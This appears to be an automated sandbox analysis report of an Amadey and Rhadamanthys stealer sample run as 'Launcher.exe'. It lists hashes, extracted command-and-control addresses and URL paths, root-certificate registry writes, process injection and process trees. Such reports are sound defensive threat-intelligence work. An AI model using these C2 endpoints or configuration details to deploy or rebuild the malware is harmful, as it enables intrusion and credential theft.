amadey | fb07af2aead3bdf360f555fc872191e43c2f0acbfc9258435f9a30afe272ba03

Analysis

max time kernel
233s
max time network
275s
platform
windows10-2004_x64
resource
win10v2004-20240226-en
resource tags

arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system
submitted
29-03-2024 14:54

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Launcher.exe
Size

364KB
MD5

93fde4e38a84c83af842f73b176ab8dc
SHA1

e8c55cc160a0a94e404f544b22e38511b9d71da8
SHA256

fb07af2aead3bdf360f555fc872191e43c2f0acbfc9258435f9a30afe272ba03
SHA512

48720aebe2158b8a58fc3431c2e6f68271fbade51303ad9cb5b0493efaec6053ff0c19a898841ef7c57a3c4d042ac8e7157fb3dc79593c1dfcdcf88e1469fdec
SSDEEP

6144:MpS9kEFKbITUvR8cy8dzQ7Lcf3Si96sfO+2RZrTql9unNrkYqliwrqH1JWP6f:Mp8KLBzQ7Lcf3SiQs2FTTql9unNrkvT2

Score

10^/10

amadey rhadamanthys stealer trojan

Malware Config

Extracted

Family

amadey

Version

4.19

http://185.196.10.188

http://45.159.189.140

http://89.23.103.42

Attributes

install_dir
b4e248fdbd
install_file
Dctooux.exe
strings_key
01edd7c913096383774168b5aeebc95e
url_paths
/hb9IvshS/index.php
/hb9IvshS2/index.php
/hb9IvshS3/index.php

rc4.plain

Signatures

Amadey
Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.
trojan amadey
Rhadamanthys
Rhadamanthys is an info stealer written in C++ first seen in August 2022.
stealer rhadamanthys
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs

Processes:

plugin16904

description pid process target process

PID 3700 created 2768 3700 plugin16904 sihost.exe

description	pid	process	target process
PID 3700 created 2768	3700	plugin16904	sihost.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 8 IoCs

Web Service

T1102

Processes:

flow	ioc
155	raw.githubusercontent.com
161	raw.githubusercontent.com
165	raw.githubusercontent.com
115	bitbucket.org
116	bitbucket.org
117	bitbucket.org
118	bitbucket.org
154	raw.githubusercontent.com

Checks computer location settings 2 TTPs 3 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

Launcher.exeLaunhcer.exeLauncher.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-3045580317-3728985860-206385570-1000\Control Panel\International\Geo\Nation	Launcher.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3045580317-3728985860-206385570-1000\Control Panel\International\Geo\Nation	Launhcer.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3045580317-3728985860-206385570-1000\Control Panel\International\Geo\Nation	Launcher.exe

Executes dropped EXE 10 IoCs

Processes:

Launcher.exeLaunhcer.exeLauncher.exeLauncher.exeLauncher.exewget.exewinrar.exeplugin16904wget.exewinrar.exe

pid	process
4848	Launcher.exe
5740	Launhcer.exe
2612	Launcher.exe
6136	Launcher.exe
5040	Launcher.exe
1800	wget.exe
5284	winrar.exe
3700	plugin16904
5192	wget.exe
1248	winrar.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Program crash 10 IoCs

Processes:

WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exe

pid	pid_target	process	target process
380	3700	WerFault.exe	plugin16904
5756	5940	WerFault.exe	3plugin16826
4228	5940	WerFault.exe	3plugin16826
4668	5940	WerFault.exe	3plugin16826
6124	5940	WerFault.exe	3plugin16826
4876	5940	WerFault.exe	3plugin16826
2468	5940	WerFault.exe	3plugin16826
4924	5940	WerFault.exe	3plugin16826
5952	5940	WerFault.exe	3plugin16826
5296	5940	WerFault.exe	3plugin16826

Checks processor information in registry 2 TTPs 5 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

firefox.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe

Modifies registry class 1 IoCs

Processes:

firefox.exe

description ioc process

Key created \REGISTRY\USER\S-1-5-21-3045580317-3728985860-206385570-1000_Classes\Local Settings firefox.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-3045580317-3728985860-206385570-1000_Classes\Local Settings	firefox.exe

Modifies system certificate store 2 TTPs 5 IoCs

evasion spyware trojan

Install Root Certificate

T1553.004

Modify Registry

T1112

Processes:

Launcher.exe

description	ioc	process
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D69B561148F01C77C54578C10926DF5B856976AD\Blob = 040000000100000010000000c5dfb849ca051355ee2dba1ac33eb028030000000100000014000000d69b561148f01c77c54578c10926df5b856976ad1d000000010000001000000001728e1ecf7a9d86fb3cec8948aba9531400000001000000140000008ff04b7fa82e4524ae4d50fa639a8bdee2dd1bbc620000000100000020000000cbb522d7b7f127ad6a0113865bdf1cd4102e7d0759af635a7cf4720dc963c53b0b000000010000003000000047006c006f00620061006c005300690067006e00200052006f006f00740020004300410020002d002000520033000000530000000100000040000000303e301f06092b06010401a032010130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703080f00000001000000200000005229ba15b31b0c6f4cca89c2985177974327d1b689a3b935a0bd975532af22ab2000000001000000630300003082035f30820247a003020102020b04000000000121585308a2300d06092a864886f70d01010b0500304c3120301e060355040b1317476c6f62616c5369676e20526f6f74204341202d20523331133011060355040a130a476c6f62616c5369676e311330110603550403130a476c6f62616c5369676e301e170d3039303331383130303030305a170d3239303331383130303030305a304c3120301e060355040b1317476c6f62616c5369676e20526f6f74204341202d20523331133011060355040a130a476c6f62616c5369676e311330110603550403130a476c6f62616c5369676e30820122300d06092a864886f70d01010105000382010f003082010a0282010100cc2576907906782216f5c083b684ca289efd057611c5ad8872fc460243c7b28a9d045f24cb2e4be1608246e152ab0c8147706cdd64d1ebf52ca30f823d0c2bae97d7b614861079bb3b1380778c08e149d26a622f1f5efa9668df892795389f06d73ec9cb26590d73deb0c8e9260e8315c6ef5b8bd20460ca49a628f6693bf6cbc82891e59d8a615737ac7414dc74e03aee722f2e9cfbd0bbbff53d00e10633e8822bae53a63a16738cdd410e203ac0b4a7a1e9b24f902e3260e957cbb904926868e538266075b29f77ff9114efae2049fcad401548d1023161195eb897efad77b7649a7abf5fc113ef9b62fb0d6ce0546916a903da6ee983937176c6698582170203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e041604148ff04b7fa82e4524ae4d50fa639a8bdee2dd1bbc300d06092a864886f70d01010b050003820101004b40dbc050aafec80ceff796544549bb96000941acb3138686280733ca6be674b9ba002daea40ad3f5f1f10f8abf73674a83c7447b78e0af6e6c6f03298e333945c38ee4b9576caafc1296ec53c62de4246cb99463fbdc536867563e83b8cf3521c3c968fecedac253aacc908ae9f05d468c95dd7a58281a2f1ddecd0037418fed446dd75328977ef367041e15d78a96b4d3de4c27a44c1b737376f41799c21f7a0ee32d08ad0a1c2cff3cab550e0f917e36ebc35749bee12e2d7c608bc3415113239dcef7326b9401a899e72c331f3a3b25d28640ce3b2c8678c9612f14baeedb556fdf84ee05094dbd28d872ced36250651eeb92978331d9b3b5ca47583f5f	Launcher.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D69B561148F01C77C54578C10926DF5B856976AD\Blob = 190000000100000010000000d0fd3c9c380d7b65e26b9a3fedd39b8f0f00000001000000200000005229ba15b31b0c6f4cca89c2985177974327d1b689a3b935a0bd975532af22ab090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b06010505070308530000000100000040000000303e301f06092b06010401a032010130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00b000000010000003000000047006c006f00620061006c005300690067006e00200052006f006f00740020004300410020002d002000520033000000620000000100000020000000cbb522d7b7f127ad6a0113865bdf1cd4102e7d0759af635a7cf4720dc963c53b1400000001000000140000008ff04b7fa82e4524ae4d50fa639a8bdee2dd1bbc1d000000010000001000000001728e1ecf7a9d86fb3cec8948aba953030000000100000014000000d69b561148f01c77c54578c10926df5b856976ad040000000100000010000000c5dfb849ca051355ee2dba1ac33eb0282000000001000000630300003082035f30820247a003020102020b04000000000121585308a2300d06092a864886f70d01010b0500304c3120301e060355040b1317476c6f62616c5369676e20526f6f74204341202d20523331133011060355040a130a476c6f62616c5369676e311330110603550403130a476c6f62616c5369676e301e170d3039303331383130303030305a170d3239303331383130303030305a304c3120301e060355040b1317476c6f62616c5369676e20526f6f74204341202d20523331133011060355040a130a476c6f62616c5369676e311330110603550403130a476c6f62616c5369676e30820122300d06092a864886f70d01010105000382010f003082010a0282010100cc2576907906782216f5c083b684ca289efd057611c5ad8872fc460243c7b28a9d045f24cb2e4be1608246e152ab0c8147706cdd64d1ebf52ca30f823d0c2bae97d7b614861079bb3b1380778c08e149d26a622f1f5efa9668df892795389f06d73ec9cb26590d73deb0c8e9260e8315c6ef5b8bd20460ca49a628f6693bf6cbc82891e59d8a615737ac7414dc74e03aee722f2e9cfbd0bbbff53d00e10633e8822bae53a63a16738cdd410e203ac0b4a7a1e9b24f902e3260e957cbb904926868e538266075b29f77ff9114efae2049fcad401548d1023161195eb897efad77b7649a7abf5fc113ef9b62fb0d6ce0546916a903da6ee983937176c6698582170203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e041604148ff04b7fa82e4524ae4d50fa639a8bdee2dd1bbc300d06092a864886f70d01010b050003820101004b40dbc050aafec80ceff796544549bb96000941acb3138686280733ca6be674b9ba002daea40ad3f5f1f10f8abf73674a83c7447b78e0af6e6c6f03298e333945c38ee4b9576caafc1296ec53c62de4246cb99463fbdc536867563e83b8cf3521c3c968fecedac253aacc908ae9f05d468c95dd7a58281a2f1ddecd0037418fed446dd75328977ef367041e15d78a96b4d3de4c27a44c1b737376f41799c21f7a0ee32d08ad0a1c2cff3cab550e0f917e36ebc35749bee12e2d7c608bc3415113239dcef7326b9401a899e72c331f3a3b25d28640ce3b2c8678c9612f14baeedb556fdf84ee05094dbd28d872ced36250651eeb92978331d9b3b5ca47583f5f	Launcher.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D69B561148F01C77C54578C10926DF5B856976AD\Blob = 5c000000010000000400000000080000040000000100000010000000c5dfb849ca051355ee2dba1ac33eb028030000000100000014000000d69b561148f01c77c54578c10926df5b856976ad1d000000010000001000000001728e1ecf7a9d86fb3cec8948aba9531400000001000000140000008ff04b7fa82e4524ae4d50fa639a8bdee2dd1bbc620000000100000020000000cbb522d7b7f127ad6a0113865bdf1cd4102e7d0759af635a7cf4720dc963c53b0b000000010000003000000047006c006f00620061006c005300690067006e00200052006f006f00740020004300410020002d002000520033000000530000000100000040000000303e301f06092b06010401a032010130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703080f00000001000000200000005229ba15b31b0c6f4cca89c2985177974327d1b689a3b935a0bd975532af22ab190000000100000010000000d0fd3c9c380d7b65e26b9a3fedd39b8f2000000001000000630300003082035f30820247a003020102020b04000000000121585308a2300d06092a864886f70d01010b0500304c3120301e060355040b1317476c6f62616c5369676e20526f6f74204341202d20523331133011060355040a130a476c6f62616c5369676e311330110603550403130a476c6f62616c5369676e301e170d3039303331383130303030305a170d3239303331383130303030305a304c3120301e060355040b1317476c6f62616c5369676e20526f6f74204341202d20523331133011060355040a130a476c6f62616c5369676e311330110603550403130a476c6f62616c5369676e30820122300d06092a864886f70d01010105000382010f003082010a0282010100cc2576907906782216f5c083b684ca289efd057611c5ad8872fc460243c7b28a9d045f24cb2e4be1608246e152ab0c8147706cdd64d1ebf52ca30f823d0c2bae97d7b614861079bb3b1380778c08e149d26a622f1f5efa9668df892795389f06d73ec9cb26590d73deb0c8e9260e8315c6ef5b8bd20460ca49a628f6693bf6cbc82891e59d8a615737ac7414dc74e03aee722f2e9cfbd0bbbff53d00e10633e8822bae53a63a16738cdd410e203ac0b4a7a1e9b24f902e3260e957cbb904926868e538266075b29f77ff9114efae2049fcad401548d1023161195eb897efad77b7649a7abf5fc113ef9b62fb0d6ce0546916a903da6ee983937176c6698582170203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e041604148ff04b7fa82e4524ae4d50fa639a8bdee2dd1bbc300d06092a864886f70d01010b050003820101004b40dbc050aafec80ceff796544549bb96000941acb3138686280733ca6be674b9ba002daea40ad3f5f1f10f8abf73674a83c7447b78e0af6e6c6f03298e333945c38ee4b9576caafc1296ec53c62de4246cb99463fbdc536867563e83b8cf3521c3c968fecedac253aacc908ae9f05d468c95dd7a58281a2f1ddecd0037418fed446dd75328977ef367041e15d78a96b4d3de4c27a44c1b737376f41799c21f7a0ee32d08ad0a1c2cff3cab550e0f917e36ebc35749bee12e2d7c608bc3415113239dcef7326b9401a899e72c331f3a3b25d28640ce3b2c8678c9612f14baeedb556fdf84ee05094dbd28d872ced36250651eeb92978331d9b3b5ca47583f5f	Launcher.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D69B561148F01C77C54578C10926DF5B856976AD	Launcher.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D69B561148F01C77C54578C10926DF5B856976AD\Blob = 0f00000001000000200000005229ba15b31b0c6f4cca89c2985177974327d1b689a3b935a0bd975532af22ab090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b06010505070308530000000100000040000000303e301f06092b06010401a032010130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00b000000010000003000000047006c006f00620061006c005300690067006e00200052006f006f00740020004300410020002d002000520033000000620000000100000020000000cbb522d7b7f127ad6a0113865bdf1cd4102e7d0759af635a7cf4720dc963c53b1400000001000000140000008ff04b7fa82e4524ae4d50fa639a8bdee2dd1bbc1d000000010000001000000001728e1ecf7a9d86fb3cec8948aba953030000000100000014000000d69b561148f01c77c54578c10926df5b856976ad2000000001000000630300003082035f30820247a003020102020b04000000000121585308a2300d06092a864886f70d01010b0500304c3120301e060355040b1317476c6f62616c5369676e20526f6f74204341202d20523331133011060355040a130a476c6f62616c5369676e311330110603550403130a476c6f62616c5369676e301e170d3039303331383130303030305a170d3239303331383130303030305a304c3120301e060355040b1317476c6f62616c5369676e20526f6f74204341202d20523331133011060355040a130a476c6f62616c5369676e311330110603550403130a476c6f62616c5369676e30820122300d06092a864886f70d01010105000382010f003082010a0282010100cc2576907906782216f5c083b684ca289efd057611c5ad8872fc460243c7b28a9d045f24cb2e4be1608246e152ab0c8147706cdd64d1ebf52ca30f823d0c2bae97d7b614861079bb3b1380778c08e149d26a622f1f5efa9668df892795389f06d73ec9cb26590d73deb0c8e9260e8315c6ef5b8bd20460ca49a628f6693bf6cbc82891e59d8a615737ac7414dc74e03aee722f2e9cfbd0bbbff53d00e10633e8822bae53a63a16738cdd410e203ac0b4a7a1e9b24f902e3260e957cbb904926868e538266075b29f77ff9114efae2049fcad401548d1023161195eb897efad77b7649a7abf5fc113ef9b62fb0d6ce0546916a903da6ee983937176c6698582170203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e041604148ff04b7fa82e4524ae4d50fa639a8bdee2dd1bbc300d06092a864886f70d01010b050003820101004b40dbc050aafec80ceff796544549bb96000941acb3138686280733ca6be674b9ba002daea40ad3f5f1f10f8abf73674a83c7447b78e0af6e6c6f03298e333945c38ee4b9576caafc1296ec53c62de4246cb99463fbdc536867563e83b8cf3521c3c968fecedac253aacc908ae9f05d468c95dd7a58281a2f1ddecd0037418fed446dd75328977ef367041e15d78a96b4d3de4c27a44c1b737376f41799c21f7a0ee32d08ad0a1c2cff3cab550e0f917e36ebc35749bee12e2d7c608bc3415113239dcef7326b9401a899e72c331f3a3b25d28640ce3b2c8678c9612f14baeedb556fdf84ee05094dbd28d872ced36250651eeb92978331d9b3b5ca47583f5f	Launcher.exe

NTFS ADS 1 IoCs

Processes:

firefox.exe

description ioc process

File created C:\Users\Admin\Downloads\NordVPN-10_11.zip:Zone.Identifier firefox.exe

description	ioc	process
File created	C:\Users\Admin\Downloads\NordVPN-10_11.zip:Zone.Identifier	firefox.exe

Suspicious behavior: EnumeratesProcesses 12 IoCs

Processes:

powershell.exepowershell.exeplugin16904dialer.exe

pid	process
2392	powershell.exe
2392	powershell.exe
2392	powershell.exe
4808	powershell.exe
4808	powershell.exe
4808	powershell.exe
3700	plugin16904
3700	plugin16904
5772	dialer.exe
5772	dialer.exe
5772	dialer.exe
5772	dialer.exe

Suspicious use of AdjustPrivilegeToken 16 IoCs

Processes:

firefox.exe7zG.exepowershell.exepowershell.exe7zG.exe

description	pid	process
Token: SeDebugPrivilege	1220	firefox.exe
Token: SeDebugPrivilege	1220	firefox.exe
Token: SeDebugPrivilege	1220	firefox.exe
Token: SeDebugPrivilege	1220	firefox.exe
Token: SeDebugPrivilege	1220	firefox.exe
Token: SeDebugPrivilege	1220	firefox.exe
Token: SeRestorePrivilege	6052	7zG.exe
Token: 35	6052	7zG.exe
Token: SeSecurityPrivilege	6052	7zG.exe
Token: SeSecurityPrivilege	6052	7zG.exe
Token: SeDebugPrivilege	2392	powershell.exe
Token: SeDebugPrivilege	4808	powershell.exe
Token: SeRestorePrivilege	536	7zG.exe
Token: 35	536	7zG.exe
Token: SeSecurityPrivilege	536	7zG.exe
Token: SeSecurityPrivilege	536	7zG.exe

Suspicious use of FindShellTrayWindow 10 IoCs

Processes:

firefox.exe7zG.exewget.exewinrar.exewget.exe7zG.exe

pid process

1220 firefox.exe
1220 firefox.exe
1220 firefox.exe
1220 firefox.exe
6052 7zG.exe
1800 wget.exe
5284 winrar.exe
5284 winrar.exe
5192 wget.exe
536 7zG.exe
Suspicious use of SendNotifyMessage 3 IoCs

Processes:

firefox.exe

pid process

1220 firefox.exe
1220 firefox.exe
1220 firefox.exe
Suspicious use of SetWindowsHookEx 4 IoCs

Processes:

firefox.exe

pid process

1220 firefox.exe
1220 firefox.exe
1220 firefox.exe
1220 firefox.exe

pid	process
1220	firefox.exe
1220	firefox.exe
1220	firefox.exe
1220	firefox.exe
6052	7zG.exe
1800	wget.exe
5284	winrar.exe
5284	winrar.exe
5192	wget.exe
536	7zG.exe

pid	process
1220	firefox.exe
1220	firefox.exe
1220	firefox.exe

pid	process
1220	firefox.exe
1220	firefox.exe
1220	firefox.exe
1220	firefox.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

firefox.exefirefox.exe

description	pid	process	target process
PID 820 wrote to memory of 1220	820	firefox.exe	firefox.exe
PID 820 wrote to memory of 1220	820	firefox.exe	firefox.exe
PID 820 wrote to memory of 1220	820	firefox.exe	firefox.exe
PID 820 wrote to memory of 1220	820	firefox.exe	firefox.exe
PID 820 wrote to memory of 1220	820	firefox.exe	firefox.exe
PID 820 wrote to memory of 1220	820	firefox.exe	firefox.exe
PID 820 wrote to memory of 1220	820	firefox.exe	firefox.exe
PID 820 wrote to memory of 1220	820	firefox.exe	firefox.exe
PID 820 wrote to memory of 1220	820	firefox.exe	firefox.exe
PID 820 wrote to memory of 1220	820	firefox.exe	firefox.exe
PID 820 wrote to memory of 1220	820	firefox.exe	firefox.exe
PID 1220 wrote to memory of 1764	1220	firefox.exe	firefox.exe
PID 1220 wrote to memory of 1764	1220	firefox.exe	firefox.exe
PID 1220 wrote to memory of 2892	1220	firefox.exe	firefox.exe
PID 1220 wrote to memory of 2892	1220	firefox.exe	firefox.exe
PID 1220 wrote to memory of 2892	1220	firefox.exe	firefox.exe
PID 1220 wrote to memory of 2892	1220	firefox.exe	firefox.exe
PID 1220 wrote to memory of 2892	1220	firefox.exe	firefox.exe
PID 1220 wrote to memory of 2892	1220	firefox.exe	firefox.exe
PID 1220 wrote to memory of 2892	1220	firefox.exe	firefox.exe
PID 1220 wrote to memory of 2892	1220	firefox.exe	firefox.exe
PID 1220 wrote to memory of 2892	1220	firefox.exe	firefox.exe
PID 1220 wrote to memory of 2892	1220	firefox.exe	firefox.exe
PID 1220 wrote to memory of 2892	1220	firefox.exe	firefox.exe
PID 1220 wrote to memory of 2892	1220	firefox.exe	firefox.exe
PID 1220 wrote to memory of 2892	1220	firefox.exe	firefox.exe
PID 1220 wrote to memory of 2892	1220	firefox.exe	firefox.exe
PID 1220 wrote to memory of 2892	1220	firefox.exe	firefox.exe
PID 1220 wrote to memory of 2892	1220	firefox.exe	firefox.exe
PID 1220 wrote to memory of 2892	1220	firefox.exe	firefox.exe
PID 1220 wrote to memory of 2892	1220	firefox.exe	firefox.exe
PID 1220 wrote to memory of 2892	1220	firefox.exe	firefox.exe
PID 1220 wrote to memory of 2892	1220	firefox.exe	firefox.exe
PID 1220 wrote to memory of 2892	1220	firefox.exe	firefox.exe
PID 1220 wrote to memory of 2892	1220	firefox.exe	firefox.exe
PID 1220 wrote to memory of 2892	1220	firefox.exe	firefox.exe
PID 1220 wrote to memory of 2892	1220	firefox.exe	firefox.exe
PID 1220 wrote to memory of 2892	1220	firefox.exe	firefox.exe
PID 1220 wrote to memory of 2892	1220	firefox.exe	firefox.exe
PID 1220 wrote to memory of 2892	1220	firefox.exe	firefox.exe
PID 1220 wrote to memory of 2892	1220	firefox.exe	firefox.exe
PID 1220 wrote to memory of 2892	1220	firefox.exe	firefox.exe
PID 1220 wrote to memory of 2892	1220	firefox.exe	firefox.exe
PID 1220 wrote to memory of 2892	1220	firefox.exe	firefox.exe
PID 1220 wrote to memory of 2892	1220	firefox.exe	firefox.exe
PID 1220 wrote to memory of 2892	1220	firefox.exe	firefox.exe
PID 1220 wrote to memory of 2892	1220	firefox.exe	firefox.exe
PID 1220 wrote to memory of 2892	1220	firefox.exe	firefox.exe
PID 1220 wrote to memory of 2892	1220	firefox.exe	firefox.exe
PID 1220 wrote to memory of 2892	1220	firefox.exe	firefox.exe
PID 1220 wrote to memory of 2892	1220	firefox.exe	firefox.exe
PID 1220 wrote to memory of 2892	1220	firefox.exe	firefox.exe
PID 1220 wrote to memory of 2892	1220	firefox.exe	firefox.exe
PID 1220 wrote to memory of 2892	1220	firefox.exe	firefox.exe
PID 1220 wrote to memory of 2892	1220	firefox.exe	firefox.exe
PID 1220 wrote to memory of 2892	1220	firefox.exe	firefox.exe
PID 1220 wrote to memory of 2892	1220	firefox.exe	firefox.exe
PID 1220 wrote to memory of 2892	1220	firefox.exe	firefox.exe
PID 1220 wrote to memory of 2892	1220	firefox.exe	firefox.exe
PID 1220 wrote to memory of 2892	1220	firefox.exe	firefox.exe
PID 1220 wrote to memory of 2892	1220	firefox.exe	firefox.exe
PID 1220 wrote to memory of 2068	1220	firefox.exe	firefox.exe
PID 1220 wrote to memory of 2068	1220	firefox.exe	firefox.exe
PID 1220 wrote to memory of 2068	1220	firefox.exe	firefox.exe

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Windows\system32\sihost.exe
sihost.exe
1⤵
PID:2768

C:\Windows\SysWOW64\dialer.exe
"C:\Windows\system32\dialer.exe"
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:5772

C:\Users\Admin\AppData\Local\Temp\Launcher.exe
"C:\Users\Admin\AppData\Local\Temp\Launcher.exe"
1⤵
- Modifies system certificate store
PID:3660

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:820

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe"
2⤵
- Checks processor information in registry
- Modifies registry class
- NTFS ADS
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1220

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1220.0.1356778034\781898511" -parentBuildID 20221007134813 -prefsHandle 1888 -prefMapHandle 1880 -prefsLen 20749 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {bac3c253-492e-4754-8824-332a5a2ce8c1} 1220 "\\.\pipe\gecko-crash-server-pipe.1220" 1980 1450b8f6a58 gpu
3⤵
PID:1764

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1220.1.824453598\2145723619" -parentBuildID 20221007134813 -prefsHandle 2368 -prefMapHandle 2364 -prefsLen 20785 -prefMapSize 233444 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {acaa10f2-4a25-4541-ba6c-256fe5ca92f9} 1220 "\\.\pipe\gecko-crash-server-pipe.1220" 2380 1450b7f5458 socket
3⤵
PID:2892

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1220.2.353070175\1465853438" -childID 1 -isForBrowser -prefsHandle 3404 -prefMapHandle 3400 -prefsLen 20823 -prefMapSize 233444 -jsInitHandle 1300 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {438e99c7-e7df-4dcd-88d1-7e7cf4d178fd} 1220 "\\.\pipe\gecko-crash-server-pipe.1220" 3120 1450f9bdc58 tab
3⤵
PID:2068

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1220.3.1668280839\1170008933" -childID 2 -isForBrowser -prefsHandle 3576 -prefMapHandle 3572 -prefsLen 26066 -prefMapSize 233444 -jsInitHandle 1300 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {ec4c2570-f71b-4ea2-86f9-0942de763845} 1220 "\\.\pipe\gecko-crash-server-pipe.1220" 3588 1450e3ad558 tab
3⤵
PID:4496

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1220.4.1512091846\1798937739" -childID 3 -isForBrowser -prefsHandle 4544 -prefMapHandle 4540 -prefsLen 26125 -prefMapSize 233444 -jsInitHandle 1300 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {e44030b0-6a2d-4728-a678-f6897fe0e0cc} 1220 "\\.\pipe\gecko-crash-server-pipe.1220" 4552 145115a2f58 tab
3⤵
PID:3832

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1220.5.1946169069\286040142" -childID 4 -isForBrowser -prefsHandle 5000 -prefMapHandle 4996 -prefsLen 26125 -prefMapSize 233444 -jsInitHandle 1300 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {48b1b25d-d050-42b7-9d6c-a24b299f21bc} 1220 "\\.\pipe\gecko-crash-server-pipe.1220" 5008 14511f09c58 tab
3⤵
PID:3080

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1220.6.500169602\1990768902" -childID 5 -isForBrowser -prefsHandle 4936 -prefMapHandle 4932 -prefsLen 26125 -prefMapSize 233444 -jsInitHandle 1300 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {7e902716-9475-45c0-996a-fa79f2f68a0a} 1220 "\\.\pipe\gecko-crash-server-pipe.1220" 5032 14511f0c258 tab
3⤵
PID:2380

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1220.7.1205998962\1432607393" -childID 6 -isForBrowser -prefsHandle 5288 -prefMapHandle 5164 -prefsLen 26125 -prefMapSize 233444 -jsInitHandle 1300 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {e73a16d0-cffd-455e-a9e9-294ea1e798fb} 1220 "\\.\pipe\gecko-crash-server-pipe.1220" 5276 14511f0d758 tab
3⤵
PID:1816

C:\Program Files\Mozilla Firefox\firefox.exe
